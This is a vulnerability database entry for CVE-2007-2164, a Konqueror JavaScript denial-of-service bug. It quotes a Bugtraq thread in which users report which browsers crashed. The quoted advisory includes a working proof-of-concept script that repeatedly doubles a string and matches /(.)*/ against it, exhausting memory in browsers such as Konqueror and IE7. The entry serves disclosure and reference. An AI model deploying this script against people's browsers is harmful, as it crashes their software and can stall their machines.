Konqueror JavaScript Denial-of-Service Vulnerability

Vulnerability ID: 1190895    Vulnerability type: Unknown
Published: 2007-04-22    Updated: 2007-04-22
CVE ID: CVE-2007-2164    CNNVD-ID: CNNVD-200704-399
Platform: N/A    CVSS score: 5.0
|Source
https://www.securityfocus.com/bid/86284
https://cxsecurity.com/issue/WLB-2007040107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-399
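|Vulnerability details
Konqueror is part of the KDE desktop environment and is used mainly on Linux and BSD-family operating systems. Konqueror allows remote attackers to cause a denial of service (browser crash) via JavaScript that matches a regular expression against a long string (for example, /(.)*/).
|Exploit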
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nope.  Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it
didn't even flinch.  No OOM-killing here.

On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for
about five minutes (the machine continued to run well enough if just a
bit slower) until Konq sig-sixed itself.

Cheers

The Anarcat wrote:
> Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
> rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
> 
> I would think that Firefox and most browsers implementing javascript
> would die an horrible OOM death on this.
> 
> A.
> 
> On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> 
> 
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
> 
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
> 
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
> 
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
> 
> V. Code
> 
> $ more /stupidInternetExploder.html
> 
> <script>
> 
> var reg = /(.)*/;
> 
> var z = 'Z';
>                while (z.length <= 
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999) z+=z;
>        var boum = reg.exec(z);
> 
> </script>
> 
> Goodbye
> 
> 
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net 
> 
> The happiness of society is the end of government.
> John Adams
> 
> 
>>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX
N1X/wJSO4U4Sx3z5Yn0S6Tk=
=T/tc
-----END PGP SIGNATURE-----
|Affected products
KDE Konqueror 3.5.5
|References

Source: BUGTRAQ
Name: 20070417 Re: Internet Explorer Crash
Link: http://www.securityfocus.com/archive/1/archive/1/466147/100/0/threaded
Source: BUGTRAQ
Name: 20070417 Internet Explorer Crash
Link: http://www.securityfocus.com/archive/1/archive/1/466017/100/0/threaded
Source: SREASON
Name: 2600
Link: http://securityreason.com/securityalert/2600